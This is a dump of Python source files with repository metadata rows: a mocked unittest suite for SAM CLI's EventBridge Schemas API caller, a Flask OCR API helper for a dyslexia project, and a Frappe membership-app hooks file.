from samcli.lib.schemas.schemas_api_caller import SchemasApiCaller
class TestSchemasCommand(TestCase):
    def setUp(self):
        # Fresh mocked Schemas service client for every test case.
        self.client = Mock()
    def test_list_registries_with_next_token(self):
        """list_registries surfaces the page's registries and its NextToken."""
        max_items = 10
        schemas_api_caller = SchemasApiCaller(self.client)
        self.client.can_paginate.return_value = True
        # Stub a single ListRegistries page that carries a NextToken.
        self.client.get_paginator.return_value.paginate.return_value = [
            {
                "ResponseMetadata": {
                    "RequestId": "26f73117-024e-49ce-8788-ea4d9278fdd8",
                    "HTTPStatusCode": 200,
                    "HTTPHeaders": {},
                    "RetryAttempts": 0,
                },
                "NextToken": "1111111111",
                "Registries": [{"RegistryName": "aws.events"}],
            }
        ]
        list_registries_response = schemas_api_caller.list_registries("next_token", max_items)
        self.assertEqual(list_registries_response["registries"], ["aws.events"])
        self.assertEqual(list_registries_response["next_token"], "1111111111")
        # The paginator must be created once and fed our pagination config.
        self.client.get_paginator.assert_called_once()
        self.client.get_paginator.assert_called_once_with("list_registries")
        self.client.get_paginator.return_value.paginate.assert_called_once_with(
            PaginationConfig={"StartingToken": "next_token", "MaxItems": max_items, "PageSize": max_items}
        )
    def test_list_registries_without_next_token(self):
        """Without a NextToken in the response, next_token is reported as None."""
        max_items = 10
        schemas_api_caller = SchemasApiCaller(self.client)
        self.client.can_paginate.return_value = True
        # Stub a single ListRegistries page with no NextToken (last page).
        self.client.get_paginator.return_value.paginate.return_value = [
            {
                "ResponseMetadata": {
                    "RequestId": "26f73117-024e-49ce-8788-ea4d9278fdd8",
                    "HTTPStatusCode": 200,
                    "HTTPHeaders": {},
                    "RetryAttempts": 0,
                },
                "Registries": [{"RegistryName": "aws.events"}],
            }
        ]
        list_registries_response = schemas_api_caller.list_registries(None, max_items)
        self.assertEqual(list_registries_response["registries"], ["aws.events"])
        self.assertEqual(list_registries_response["next_token"], None)
        self.client.get_paginator.assert_called_once()
        self.client.get_paginator.assert_called_once_with("list_registries")
        self.client.get_paginator.return_value.paginate.assert_called_once_with(
            PaginationConfig={"StartingToken": None, "MaxItems": max_items, "PageSize": max_items}
        )
    def test_list_registries_raises_not_available_in_region_exception(self):
        """An endpoint connection failure maps to NotAvailableInRegion."""
        max_items = 10
        schemas_api_caller = SchemasApiCaller(self.client)
        self.client.can_paginate.return_value = False
        # Simulate a region where the Schemas endpoint does not exist.
        self.client.get_paginator.return_value.paginate.side_effect = botocore.exceptions.EndpointConnectionError(
            endpoint_url="Not valid endpoint."
        )
        with self.assertRaises(NotAvailableInRegion) as ctx:
            schemas_api_caller.list_registries("next_token", max_items)
        msg = (
            "EventBridge Schemas are not available in provided region. Please check "
            "AWS doc for Schemas supported regions."
        )
        self.assertEqual(str(ctx.exception), msg)
    def test_list_schemas_with_next_token(self):
        """list_schemas surfaces the page's schema names and its NextToken."""
        registry_name = "registry1"
        max_items = 10
        schemas_api_caller = SchemasApiCaller(self.client)
        self.client.can_paginate.return_value = True
        # Stub a single ListSchemas page that carries a NextToken.
        self.client.get_paginator.return_value.paginate.return_value = [
            {
                "ResponseMetadata": {
                    "RequestId": "123",
                    "HTTPHeaders": {
                        "x-amzn-requestid": "e28",
                        "x-amz-apigw-id": "CTqLRGCbPHcFiAg=",
                        "x-amzn-trace-id": "Root=1-350;Sampled=0",
                    },
                    "RetryAttempts": 0,
                },
                "NextToken": "1111111111",
                "Schemas": [
                    {
                        "LastModified": "LastModified",
                        "SchemaName": "aws.autoscaling.AWSAPICallViaCloudTrail",
                        "VersionCount": 1,
                    }
                ],
            }
        ]
        list_schemas_response = schemas_api_caller.list_schemas(registry_name, "next_token", max_items)
        self.assertEqual(len(list_schemas_response["schemas"]), 1)
        self.assertEqual(list_schemas_response["schemas"], ["aws.autoscaling.AWSAPICallViaCloudTrail"])
        self.assertEqual(list_schemas_response["next_token"], "1111111111")
        # Pagination must target the requested registry.
        self.client.get_paginator.assert_called_once()
        self.client.get_paginator.assert_called_once_with("list_schemas")
        self.client.get_paginator.return_value.paginate.assert_called_once_with(
            RegistryName=registry_name,
            PaginationConfig={"StartingToken": "next_token", "MaxItems": max_items, "PageSize": max_items},
        )
    def test_list_schemas_without_next_token(self):
        """Without a NextToken in the response, next_token is reported as None."""
        registry_name = "registry1"
        max_items = 10
        schemas_api_caller = SchemasApiCaller(self.client)
        self.client.can_paginate.return_value = True
        # Stub a single ListSchemas page with no NextToken (last page).
        self.client.get_paginator.return_value.paginate.return_value = [
            {
                "ResponseMetadata": {
                    "RequestId": "123",
                    "HTTPHeaders": {
                        "x-amzn-requestid": "e28",
                        "x-amz-apigw-id": "CTqLRGCbPHcFiAg=",
                        "x-amzn-trace-id": "Root=1-350;Sampled=0",
                    },
                    "RetryAttempts": 0,
                },
                "Schemas": [
                    {
                        "LastModified": "LastModified",
                        "SchemaName": "aws.autoscaling.AWSAPICallViaCloudTrail",
                        "VersionCount": 1,
                    }
                ],
            }
        ]
        list_schemas_response = schemas_api_caller.list_schemas(registry_name, None, max_items)
        self.assertEqual(len(list_schemas_response["schemas"]), 1)
        self.assertEqual(list_schemas_response["schemas"], ["aws.autoscaling.AWSAPICallViaCloudTrail"])
        self.assertEqual(list_schemas_response["next_token"], None)
        self.client.get_paginator.assert_called_once()
        self.client.get_paginator.assert_called_once_with("list_schemas")
        self.client.get_paginator.return_value.paginate.assert_called_once_with(
            RegistryName=registry_name,
            PaginationConfig={"StartingToken": None, "MaxItems": max_items, "PageSize": max_items},
        )
def test_list_schemas_raises_not_available_in_region_exception(self):
max_items = 10
schemas_api_caller = SchemasApiCaller(self.client)
self.client.can_paginate.return_value = False
self.client.get_paginator.return_value.paginate.side_effect = botocore.exceptions.EndpointConnectionError(
endpoint_url="Not valid endpoint."
)
with self.assertRaises(NotAvailableInRegion) as ctx:
schemas_api_caller.list_schemas("registry-name", "next_token", max_items)
msg = (
"EventBridge Schemas are not available in provided region. Please check "
"AWS doc for Schemas supported regions."
)
self.assertEqual(str(ctx.exception), msg)
    def test_get_schema_metadata_1p(self):
        """1P (AWS-vended) schema: event source / detail type are read from the
        x-amazon-events-* fields embedded in the OpenAPI Content document."""
        self.client.describe_schema.return_value = {
            "SchemaArn": "",
            "Tags": {},
            "LastModified": "2019-11-25T20:33:14Z",
            # OpenAPI 3 document; the x-amazon-* extensions drive the metadata extraction.
            "Content": '{"components":{"schemas":{"AWSEvent":{"properties":{"account":{"type":"string"},"detail":{"$ref":"#/components/schemas/ParameterStoreChange"},'
            '"detail-type":{"type":"string"},"id":{"type":"string"},"region":{"type":"string"},"resources":{"items":{"type":"string"},"type":"array"},'
            '"source":{"type":"string"},"time":{"format":"date-time","type":"string"},"version":{"type":"string"}},"required":["detail-type","resources",'
            '"detail","id","source","time","region","version","account"],"type":"object","x-amazon-events-detail-type":"Parameter Store Change",'
            '"x-amazon-events-source":"aws.ssm"},"ParameterStoreChange":{"properties":{"description":{"type":"string"},"fromVersion":{"type":"string"},'
            '"label":{"type":"string"},"name":{"type":"string"},"operation":{"type":"string"},"toVersion":{"type":"string"},"type":{"type":"string"}},'
            '"required":["name","type","operation"],"type":"object"}}},"info":{"title":"ParameterStoreChange","version":"1.0.0",'
            '"x-amazon-schemas-generated-code-hierarchy":"schema/aws/ssm/parameterstorechange"},"openapi":"3.0.0","paths":{}}',
            "VersionCreatedDate": "2019-11-25T20:33:14Z",
            "SchemaName": "aws.ssm@ParameterStoreChange",
            "Type": "OpenApi3",
            "SchemaVersion": "1",
        }
        registry_name = "registry1"
        schema_name = "aws.ssm@ParameterStoreChange"
        schemas_api_caller = SchemasApiCaller(self.client)
        get_schema_metadata_response = schemas_api_caller.get_schema_metadata(registry_name, schema_name)
        self.assertEqual(get_schema_metadata_response["event_source"], "aws.ssm")
        self.assertEqual(get_schema_metadata_response["event_source_detail_type"], "Parameter Store Change")
        self.assertEqual(get_schema_metadata_response["schema_root_name"], "ParameterStoreChange")
        # Package hierarchy is derived from x-amazon-schemas-generated-code-hierarchy.
        self.assertEqual(
            "schema.aws.ssm.parameterstorechange", get_schema_metadata_response["schemas_package_hierarchy"]
        )
        self.client.describe_schema.assert_called_once_with(RegistryName=registry_name, SchemaName=schema_name)
    def test_get_schema_metadata_3p_schema(self):
        """3P (partner/discovered) schema: metadata still comes from the
        x-amazon-events-* fields, here with a non-AWS source ("order")."""
        self.client.describe_schema.return_value = {
            "SchemaArn": "arn:aws:schemas:us-east-1:434418839121:schema/discovered-schemas/order@NewOrder",
            "Tags": {},
            "LastModified": "2019-11-22T01:38:02Z",
            "Content": '{"openapi":"3.0.0","info":{"version":"1.0.0","title":"NewOrder"},"paths":{},"components":{"schemas":{"AWSEvent":{"type":"object",'
            '"required":["detail-type","resources","detail","id","source","time","region","version","account"],"x-amazon-events-detail-type":"NewOrder",'
            '"x-amazon-events-source":"order","properties":{"detail":{"$ref":"#/components/schemas/NewOrder"},"account":{"type":"string"},"detail-type":{'
            '"type":"string"},"id":{"type":"string"},"region":{"type":"string"},"resources":{"type":"array","items":{"type":"object"}},'
            '"source":{"type":"string"},"time":{"type":"string","format":"date-time"},"version":{"type":"string"}}},"NewOrder":{"type":"object",'
            '"required":["productId","orderId","customer"],"properties":{"customer":{"$ref":"#/components/schemas/Customer"},"orderId":{"type":"string"},'
            '"productId":{"type":"string"}}},"Customer":{"type":"object","required":["zip","country","firstName","lastName","city","street"],'
            '"properties":{"city":{"type":"string"},"country":{"type":"string"},"firstName":{"type":"string"},"lastName":{"type":"string"},'
            '"street":{"type":"string"},"zip":{"type":"string"}}}}}}',
            "VersionCreatedDate": "2019-11-22T01:49:50Z",
            "SchemaName": "order@NewOrder",
            "Type": "OpenApi3",
            "SchemaVersion": "9",
        }
        registry_name = "registry1"
        schema_name = "order@NewOrder"
        schemas_api_caller = SchemasApiCaller(self.client)
        get_schema_metadata_response = schemas_api_caller.get_schema_metadata(registry_name, schema_name)
        self.assertEqual("order", get_schema_metadata_response["event_source"])
        self.assertEqual("NewOrder", get_schema_metadata_response["event_source_detail_type"])
        self.assertEqual("NewOrder", get_schema_metadata_response["schema_root_name"])
        # No generated-code hierarchy in Content, so it is built from the source/type.
        self.assertEqual("schema.order.neworder", get_schema_metadata_response["schemas_package_hierarchy"])
        self.client.describe_schema.assert_called_once_with(RegistryName=registry_name, SchemaName=schema_name)
    def test_get_schema_metadata_2p_schema_with_one_type(self):
        """2P (customer) schema without x-amazon-events-* fields: source/detail-type
        fall back to defaults and the type name is sanitised (spaces -> underscores)."""
        self.client.describe_schema.return_value = {
            "openapi": "3.0.0",
            "info": {"version": "1.0.0", "title": "SomeAwesomeSchema"},
            "paths": {},
            "Content": '{"components":{"schemas":{"Some Awesome Schema":{"type":"object","required":["foo","bar","baz"],"properties":{"foo":{"type":"string"},'
            '"bar":{"type":"string"},"baz":{"type":"string"}}}}}}',
            "SchemaName": "2PSchema1",
        }
        registry_name = "registry1"
        schema_name = "2PSchema1"
        schemas_api_caller = SchemasApiCaller(self.client)
        get_schema_metadata_response = schemas_api_caller.get_schema_metadata(registry_name, schema_name)
        self.assertEqual(get_schema_metadata_response["event_source"], DEFAULT_EVENT_SOURCE)
        self.assertEqual(get_schema_metadata_response["event_source_detail_type"], DEFAULT_EVENT_DETAIL_TYPE)
        self.assertEqual(get_schema_metadata_response["schema_root_name"], "Some_Awesome_Schema")
        # Hierarchy is "schema." + lower-cased schema name.
        self.assertEqual(get_schema_metadata_response["schemas_package_hierarchy"], "schema.2pschema1")
        self.client.describe_schema.assert_called_once_with(RegistryName=registry_name, SchemaName=schema_name)
    def test_get_schema_metadata_2p_schema_with_multiple_type(self):
        """2P schema declaring several types: the root resolves to
        Some/Awesome/Schema.Object.1 with '/', '.' and '$' sanitised to '_'."""
        self.client.describe_schema.return_value = {
            "openapi": "3.0.0",
            "info": {"version": "1.0.0", "title": "SomeAwesomeSchema"},
            "paths": {},
            # Raw strings keep the escaped forward slashes intact in the JSON payload.
            "Content": r'{"components":{"schemas":{"Some\/Awesome\/Schema.Object.1":{"type":"object","required":["foo","bar","baz"],"properties":{"foo":{"type":"string"},'
            r'"bar":{"type":"string"},"baz":{"type":"string"}}},"Some\/Awesome\/Schema.Object$2":{"type":"object","required":["foo","bar","baz"],'
            '"properties":{"foo":{"type":"string"},"bar":{"type":"string"},"baz":{"type":"string"}}}}}}',
        }
        registry_name = "registry1"
        schema_name = "schema1"
        schemas_api_caller = SchemasApiCaller(self.client)
        get_schema_metadata_response = schemas_api_caller.get_schema_metadata(registry_name, schema_name)
        self.assertEqual(get_schema_metadata_response["event_source"], DEFAULT_EVENT_SOURCE)
        self.assertEqual(get_schema_metadata_response["event_source_detail_type"], DEFAULT_EVENT_DETAIL_TYPE)
        self.assertEqual(get_schema_metadata_response["schema_root_name"], "Some_Awesome_Schema_Object_1")
        self.assertEqual(get_schema_metadata_response["schemas_package_hierarchy"], "schema.schema1")
        self.client.describe_schema.assert_called_once_with(RegistryName=registry_name, SchemaName=schema_name)
    def test_get_schema_metadata_content_not_serializable_raises_exception(self):
        """Malformed Content must raise SchemasApiException.

        The Content payload below is intentionally invalid JSON: the very first
        key is written as `openapi"` (missing its opening quote), so parsing
        the document fails.
        """
        self.client.describe_schema.return_value = {
            "ResponseMetadata": {
                "RequestId": "389418ee-4e15-480a-8459-6c7640de7a26",
                "HTTPStatusCode": 200,
                "HTTPHeaders": {
                    "date": "Tue, 29 Oct 2019 07:20:32 GMT",
                    "content-type": "application/json",
                    "content-length": "3767",
                    "connection": "keep-alive",
                    "x-amzn-requestid": "389418ee-4e15-480a-8459-6c7640de7a26",
                    "x-amz-apigw-id": "CUE6AG_wvHcFyWA=",
                    "x-amzn-trace-id": "Root=1-5db7e83f-2c8e2cd03edc82ec7af0946c;Sampled=0",
                },
                "RetryAttempts": 0,
            },
            # Broken JSON document (note the missing quote before `openapi`).
            "Content": '{\n openapi" : "3.0.0",\n "info" : {\n "version" : "1.0.0",\n "title" : '
            '"CodeCommitPullRequestStateChange"\n },\n "paths" : { },\n "components" : {\n "schemas" '
            ': {\n "AWSEvent" : {\n "type" : "object",\n "required" : [ "detail-type", '
            '"resources", "id", "source", "time", "detail", "region", "version", "account" ],'
            '\n "x-amazon-events-detail-type" : "CodeCommit Pull Request State Change",'
            '\n "x-amazon-events-source" : "aws.codecommit",\n "properties" : {\n '
            '"detail" : {\n "$ref" : "#/components/schemas/CodeCommitPullRequestStateChange"\n '
            ' },\n "detail-type" : {\n "type" : "string"\n },'
            '\n "resources" : {\n "type" : "array",\n "items" : {\n '
            ' "type" : "string"\n }\n },\n "id" : {\n "type" : '
            '"string"\n },\n "source" : {\n "type" : "string"\n },'
            '\n "time" : {\n "type" : "string",\n "format" : "date-time"\n '
            ' },\n "region" : {\n "type" : "string",\n "enum" : [ '
            '"ap-south-1", "eu-west-3", "eu-north-1", "eu-west-2", "eu-west-1", "ap-northeast-2", '
            '"ap-northeast-1", "me-south-1", "sa-east-1", "ca-central-1", "ap-east-1", "cn-north-1", '
            '"us-gov-west-1", "ap-southeast-1", "ap-southeast-2", "eu-central-1", "us-east-1", '
            '"us-west-1", "cn-northwest-1", "us-west-2" ]\n },\n "version" : {\n '
            ' "type" : "string"\n },\n "account" : {\n "type" : "string"\n '
            ' }\n }\n },\n "CodeCommitPullRequestStateChange" : {\n "type" '
            ': "object",\n "required" : [ "sourceReference", "lastModifiedDate", "author", '
            '"pullRequestStatus", "isMerged", "notificationBody", "destinationReference", "pullRequestId", '
            '"callerUserArn", "title", "creationDate", "repositoryNames", "destinationCommit", "event", '
            '"sourceCommit" ],\n "properties" : {\n "sourceReference" : {\n '
            '"type" : "string"\n },\n "lastModifiedDate" : {\n "type" : '
            '"string"\n },\n "author" : {\n "type" : "string"\n },'
            '\n "pullRequestStatus" : {\n "type" : "string"\n },\n '
            '"isMerged" : {\n "type" : "string"\n },\n "notificationBody" : {'
            '\n "type" : "string"\n },\n "destinationReference" : {\n '
            ' "type" : "string"\n },\n "pullRequestId" : {\n "type" : '
            '"string"\n },\n "callerUserArn" : {\n "type" : "string"\n '
            ' },\n "title" : {\n "type" : "string"\n },\n '
            '"creationDate" : {\n "type" : "string"\n },\n "repositoryNames" '
            ': {\n "type" : "array",\n "items" : {\n "type" : '
            '"string"\n }\n },\n "destinationCommit" : {\n "type" '
            ': "string"\n },\n "event" : {\n "type" : "string"\n },'
            '\n "sourceCommit" : {\n "type" : "string"\n }\n }\n '
            "}\n }\n }\n}\n",
            "LastModified": "LastModified",
            "SchemaArn": "",
            "SchemaName": "aws.codecommit.CodeCommitPullRequestStateChange",
            "SchemaVersion": "1",
            "Type": "OpenApi3",
            "VersionCreatedDate": "VersionCreatedDate",
        }
        registry_name = "registry1"
        schema_name = "schema1"
        schemas_api_caller = SchemasApiCaller(self.client)
        with self.assertRaises(SchemasApiException):
            schemas_api_caller.get_schema_metadata(registry_name, schema_name)
def test_get_schema_metadata_raises_not_available_in_region_exception(self):
schemas_api_caller = SchemasApiCaller(self.client)
self.client.describe_schema.side_effect = botocore.exceptions.EndpointConnectionError(
endpoint_url="Not valid endpoint."
)
with self.assertRaises(NotAvailableInRegion) as ctx:
schemas_api_caller.get_schema_metadata("registry-name", "schema-name")
msg = (
"EventBridge Schemas are not available in provided region. Please check "
"AWS doc for Schemas supported regions."
)
self.assertEqual(str(ctx.exception), msg)
def test_get_latest_schema_version(self):
registry_name = "registry1"
schema_name = "schema1"
schemas_api_caller = SchemasApiCaller(self.client)
self.client.can_paginate.return_value = True
self.client.get_paginator.return_value.paginate.return_value = [
{
"ResponseMetadata": {},
"SchemaVersions": [
{"SchemaName": "schema1", "SchemaVersion": "1"},
{"SchemaName": "schema1", "SchemaVersion": "2"},
{"SchemaName": "schema1", "SchemaVersion": "3"},
],
}
]
get_latest_schema_version_response = schemas_api_caller.get_latest_schema_version(registry_name, schema_name)
self.assertEqual(get_latest_schema_version_response, "3")
self.client.get_paginator.assert_called_once()
self.client.get_paginator.assert_called_once_with("list_schema_versions")
self.client.get_paginator.return_value.paginate.assert_called_once_with(
RegistryName=registry_name, SchemaName=schema_name, PaginationConfig={"StartingToken": None}
)
def test_get_latest_schema_version_raises_not_available_in_region_exception(self):
schemas_api_caller = SchemasApiCaller(self.client)
self.client.can_paginate.return_value = False
self.client.get_paginator.return_value.paginate.side_effect = botocore.exceptions.EndpointConnectionError(
endpoint_url="Not valid endpoint."
)
with self.assertRaises(NotAvailableInRegion) as ctx:
schemas_api_caller.get_latest_schema_version("registry-name", "schema-name")
msg = (
"EventBridge Schemas are not available in provided region. Please check "
"AWS doc for Schemas supported regions."
)
self.assertEqual(str(ctx.exception), msg)
def test_list_registries_throws_exception_when_result_set_is_empty(self):
max_items = 10
schemas_api_caller = SchemasApiCaller(self.client)
self.client.can_paginate.return_value = True
self.client.get_paginator.return_value.paginate.return_value = []
with self.assertRaises(ResourceNotFound) as ctx:
schemas_api_caller.list_registries(None, max_items)
msg = "No Registries found. This should not be possible, please raise an issue."
self.assertEqual(str(ctx.exception), msg)
def test_list_schemas_throws_exception_when_result_set_is_empty(self):
max_items = 10
schemas_api_caller = SchemasApiCaller(self.client)
self.client.can_paginate.return_value = True
self.client.get_paginator.return_value.paginate.return_value = []
with self.assertRaises(ResourceNotFound) as ctx:
schemas_api_caller.list_schemas("aws.events", None, max_items)
msg = "No Schemas found for registry %s" % "aws.events"
self.assertEqual(str(ctx.exception), msg)
def test_download_source_code_binding(self):
response = io.BytesIO(b"some initial binary data: \x00\x01")
schemas_api_caller = SchemasApiCaller(self.client)
self.client.get_code_binding_source.return_value = {"Body": response}
with tempfile.TemporaryFile() as download_dir:
schemas_api_caller.download_source_code_binding(
"Java8", "aws.events", "aws.batch.BatchJobStateChange", "1", download_dir
)
def test_download_source_code_binding(self):
response = io.BytesIO(b"some initial binary data: \x00\x01")
schemas_api_caller = SchemasApiCaller(self.client)
self.client.get_code_binding_source.return_value = {"Body": response}
with tempfile.TemporaryFile() as download_dir:
schemas_api_caller.download_source_code_binding(
"Java8", "aws.events", "aws.batch.BatchJobStateChange", "1", download_dir
)
def test_download_source_code_binding_raises_not_available_in_region_exception(self):
response = io.BytesIO(b"some initial binary data: \x00\x01")
schemas_api_caller = SchemasApiCaller(self.client)
self.client.get_code_binding_source.side_effect = botocore.exceptions.EndpointConnectionError(
endpoint_url="Not valid endpoint."
)
with self.assertRaises(NotAvailableInRegion) as ctx:
schemas_api_caller.download_source_code_binding(
"Java8", "aws.events", "aws.batch.BatchJobStateChange", "1", "download_dir"
)
msg = (
"EventBridge Schemas are not available in provided region. Please check "
"AWS doc for Schemas supported regions."
)
self.assertEqual(str(ctx.exception), msg)
def test_put_code_binding_with_conflict_exception(self):
schemas_api_caller = SchemasApiCaller(self.client)
self.client.put_code_binding.side_effect = [
botocore.exceptions.ClientError(
{"Error": {"Code": "ConflictException", "Message": "ConflictException"}}, "operation"
)
]
schemas_api_caller.put_code_binding("Java8", "aws.events", "aws.batch.BatchJobStateChange", "1")
self.client.put_code_binding.assert_called_once_with(
Language="Java8", RegistryName="aws.events", SchemaName="aws.batch.BatchJobStateChange", SchemaVersion="1"
)
    def test_put_code_binding_with_not_found_exception(self):
        """A NotFoundException from put_code_binding must propagate (unlike ConflictException)."""
        schemas_api_caller = SchemasApiCaller(self.client)
        self.client.put_code_binding.side_effect = [
            botocore.exceptions.ClientError(
                {"Error": {"Code": "NotFoundException", "Message": "NotFoundException"}}, "operation"
            )
        ]
        # NOTE(review): assertRaises(Exception) is very broad; the concrete type
        # re-raised by SchemasApiCaller is not visible from this file — consider
        # pinning it down once confirmed.
        with self.assertRaises(Exception):
            schemas_api_caller.put_code_binding("Java8", "aws.events", "aws.batch.BatchJobStateChange", "1")
def test_put_code_binding_raises_not_available_in_region_exception(self):
schemas_api_caller = SchemasApiCaller(self.client)
self.client.put_code_binding.side_effect = botocore.exceptions.EndpointConnectionError(
endpoint_url="Not valid endpoint."
)
with self.assertRaises(NotAvailableInRegion) as ctx:
schemas_api_caller.put_code_binding("Java8", "aws.events", "aws.batch.BatchJobStateChange", "1")
msg = (
"EventBridge Schemas are not available in provided region. Please check "
"AWS doc for Schemas supported regions."
)
self.assertEqual(str(ctx.exception), msg)
def test_poll_for_code_generation_completion(self):
schemas_api_caller = SchemasApiCaller(self.client)
self.client.get_waiter.return_value.wait.return_value = None
schemas_api_caller.poll_for_code_binding_status("Java8", "aws.events", "aws.batch.BatchJobStateChange", "1")
def test_poll_for_code_generation_completion_with_failed_status(self):
schemas_api_caller = SchemasApiCaller(self.client)
self.client.get_waiter.return_value.wait.return_value = None
schemas_api_caller.poll_for_code_binding_status("Java8", "aws.events", "aws.batch.BatchJobStateChange", "1")
schemas_api_caller = SchemasApiCaller(self.client)
self.client.get_waiter.return_value.wait.side_effect = WaiterError(
name="failed", reason="Waiter encountered a terminal failure state", last_response="failed"
)
with self.assertRaises(WaiterError):
schemas_api_caller.poll_for_code_binding_status("Java8", "aws.events", "aws.batch.BatchJobStateChange", "1")
def test_poll_for_code_generation_completion_raises_not_available_in_region_exception(self):
schemas_api_caller = SchemasApiCaller(self.client)
self.client.get_waiter.return_value.wait.return_value = None
schemas_api_caller.poll_for_code_binding_status("Java8", "aws.events", "aws.batch.BatchJobStateChange", "1")
schemas_api_caller = SchemasApiCaller(self.client)
self.client.get_waiter.return_value.wait.side_effect = botocore.exceptions.EndpointConnectionError(
endpoint_url="Not valid endpoint."
)
with self.assertRaises(NotAvailableInRegion) as ctx:
schemas_api_caller.poll_for_code_binding_status("Java8", "aws.events", "aws.batch.BatchJobStateChange", "1")
msg = (
"EventBridge Schemas are not available in provided region. Please check "
"AWS doc for Schemas supported regions."
)
self.assertEqual(str(ctx.exception), msg)
| 57.957282 | 171 | 0.615586 |
89c42b7c4edbffece3c822fb68e5f419cefc32a6 | 1,677 | py | Python | dyslexia/app/api.py | SharonBrg/batch9_dyslexia | 97d1584ca9e0e834a311e98d7fd3549ae0901328 | [
"MIT"
] | null | null | null | dyslexia/app/api.py | SharonBrg/batch9_dyslexia | 97d1584ca9e0e834a311e98d7fd3549ae0901328 | [
"MIT"
] | null | null | null | dyslexia/app/api.py | SharonBrg/batch9_dyslexia | 97d1584ca9e0e834a311e98d7fd3549ae0901328 | [
"MIT"
] | null | null | null | from dyslexia.app import pipeline
from dyslexia.app.errors import NoTextFoundError, ImageBlurryError
from dyslexia.io import load_image_from_string
from PIL import Image
from io import BytesIO
import numpy as np
def load_image_into_numpy_array(data):
    """Decode raw image bytes (e.g. an uploaded file's content) into a numpy array."""
    buffer = BytesIO(data)
    pil_image = Image.open(buffer)
    return np.array(pil_image)
def get_results(data) -> dict:
    """Run the OCR pipeline on an image and collect its paragraphs.

    The input may be a string (URL or path to an image file) or the raw
    bytes of an uploaded image. On success the returned dictionary has two
    keys: 'paragraphs' (a list of text blocks) and 'bboxes' (coordinates
    (x1, y1, w, h) for each paragraph). On failure it instead contains an
    'error' entry whose code is one of IMAGE_BLURRY, NO_TEXT_FOUND or
    UNKNOWN_ERROR.

    Parameters
    ----------
    data: str or uploaded file
        Input data from the API call: either a string (URL or path to a
        file) or the stream of the uploaded image.

    Returns
    -------
    dict
        Pipeline results, or a dictionary describing the error.
    """
    try:
        if isinstance(data, str):
            image = load_image_from_string(data)
        else:
            image = load_image_into_numpy_array(data)
        paragraphs, boxes = pipeline(image)
    except ImageBlurryError as exc:
        return {'error': {'code': 'IMAGE_BLURRY', 'message': str(exc)}}
    except NoTextFoundError as exc:
        return {'error': {'code': 'NO_TEXT_FOUND', 'message': str(exc)}}
    except Exception as exc:
        return {'error': {'code': 'UNKNOWN_ERROR', 'message': str(exc)}}
    return {'paragraphs': paragraphs, 'bboxes': boxes}
559069d2a2f804d1795ae1c149d30702d5375349 | 3,785 | py | Python | membershipmanagement/hooks.py | parthagrawal9/MembershipManagement | 11a61475a135da4d73efdfbd742b79b4ed261a0f | [
"MIT"
] | null | null | null | membershipmanagement/hooks.py | parthagrawal9/MembershipManagement | 11a61475a135da4d73efdfbd742b79b4ed261a0f | [
"MIT"
] | null | null | null | membershipmanagement/hooks.py | parthagrawal9/MembershipManagement | 11a61475a135da4d73efdfbd742b79b4ed261a0f | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from . import __version__ as app_version
# Frappe app metadata: read by the framework's installer and shown on the desk.
app_name = "membershipmanagement"
app_title = "Members"
app_publisher = "Parth - M20Zero"
app_description = "Membership Management System"
app_icon = "octicon octicon-file-directory"
app_color = "grey"
app_email = "agrawal.parth9@gmail.com"
app_license = "MIT"
# Includes in <head>
# ------------------
# include js, css files in header of desk.html
# app_include_css = "/assets/membershipmanagement/css/membershipmanagement.css"
# app_include_js = "/assets/membershipmanagement/js/membershipmanagement.js"
# include js, css files in header of web template
# web_include_css = "/assets/membershipmanagement/css/membershipmanagement.css"
# web_include_js = "/assets/membershipmanagement/js/membershipmanagement.js"
# include js in page
# page_js = {"page" : "public/js/file.js"}
# include js in doctype views
# doctype_js = {"doctype" : "public/js/doctype.js"}
# doctype_list_js = {"doctype" : "public/js/doctype_list.js"}
# doctype_tree_js = {"doctype" : "public/js/doctype_tree.js"}
# doctype_calendar_js = {"doctype" : "public/js/doctype_calendar.js"}
# Home Pages
# ----------
# application home page (will override Website Settings)
# home_page = "login"
# website user home page (by Role)
# role_home_page = {
# "Role": "home_page"
# }
# Website user home page (by function)
# get_website_user_home_page = "membershipmanagement.utils.get_home_page"
# Generators
# ----------
# automatically create page for each record of this doctype
# website_generators = ["Web Page"]
# Installation
# ------------
# before_install = "membershipmanagement.install.before_install"
# after_install = "membershipmanagement.install.after_install"
# Desk Notifications
# ------------------
# See frappe.core.notifications.get_notification_config
# notification_config = "membershipmanagement.notifications.get_notification_config"
# Permissions
# -----------
# Permissions evaluated in scripted ways
# permission_query_conditions = {
# "Event": "frappe.desk.doctype.event.event.get_permission_query_conditions",
# }
#
# has_permission = {
# "Event": "frappe.desk.doctype.event.event.has_permission",
# }
# Document Events
# ---------------
# Hook on document methods and events
# Document event hooks: map DocType -> lifecycle event -> dotted handler path.
# Frappe calls these handlers when the corresponding document event fires.
doc_events={
    "Member":{
        "after_insert": "membershipmanagement.api.new_member"
    },
    "Member Request":{
        "after_insert": "membershipmanagement.api.new_membership_request",
        "on_update": "membershipmanagement.api.membership_state_change",
    }#,
    # "Email Queue":{
    #     "after_insert": "membershipmanagement.api.email_queue_send_now"
    # }
}
# doc_events = {
# "*": {
# "on_update": "method",
# "on_cancel": "method",
# "on_trash": "method"
# }
# }
# Scheduled Tasks
# ---------------
# Scheduled tasks: the framework runs each dotted path on the given cadence.
scheduler_events = {
    "daily": [
        "membershipmanagement.tasks.daily"
    ]
}
# scheduler_events = {
# "all": [
# "membershipmanagement.tasks.all"
# ],
# "daily": [
# "membershipmanagement.tasks.daily"
# ],
# "hourly": [
# "membershipmanagement.tasks.hourly"
# ],
# "weekly": [
# "membershipmanagement.tasks.weekly"
# ]
# "monthly": [
# "membershipmanagement.tasks.monthly"
# ]
# }
# Testing
# -------
# before_tests = "membershipmanagement.install.before_tests"
# Overriding Methods
# ------------------------------
#
# override_whitelisted_methods = {
# "frappe.desk.doctype.event.event.get_events": "membershipmanagement.event.get_events"
# }
#
# each overriding function accepts a `data` argument;
# generated from the base implementation of the doctype dashboard,
# along with any modifications made in other Frappe apps
# override_doctype_dashboards = {
# "Task": "membershipmanagement.task.get_dashboard_data"
# }
| 25.066225 | 88 | 0.692734 |
8310e7b4d71b5e1bfb1b1c40cd7d107e4de10bf9 | 1,851 | py | Python | flask_api.py | IK-R-S/flask-api | fd5b1b56181c9272e62326a064e6c10eb2727db3 | [
"MIT"
